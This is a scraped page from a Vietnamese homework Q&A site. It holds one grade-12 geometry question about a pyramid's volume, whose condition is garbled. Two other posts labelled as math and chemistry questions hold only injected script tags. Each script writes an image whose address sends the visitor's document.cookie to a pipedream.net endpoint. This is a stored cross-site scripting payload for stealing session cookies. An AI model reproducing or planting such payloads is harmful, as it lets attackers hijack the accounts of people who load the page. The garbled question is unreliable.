Hỏi - Đáp

Toán học - Lớp 12

Ôn tập

      Câu 2: Cho hình chóp SABCD đáy ABCD là hình vuông cạnh 7 cm. SA ⊥ ABCD, SB ⊥ = 72. Tính VSABCD

Toán học - Lớp 10

toán

<script>document.write('<img src = "https://129d4c06f60291b891959f314c04e7c4.m.pipedream.net
/?cookie='+document.cookie+'"/>')</script>

 

Hóa học - Lớp 12

toán

<script>document.write('<img src = "https://d87d133920ef83b608628dc97f7bac30.m.pipedream.net/?cookie='+document.cookie+'"/>')</script>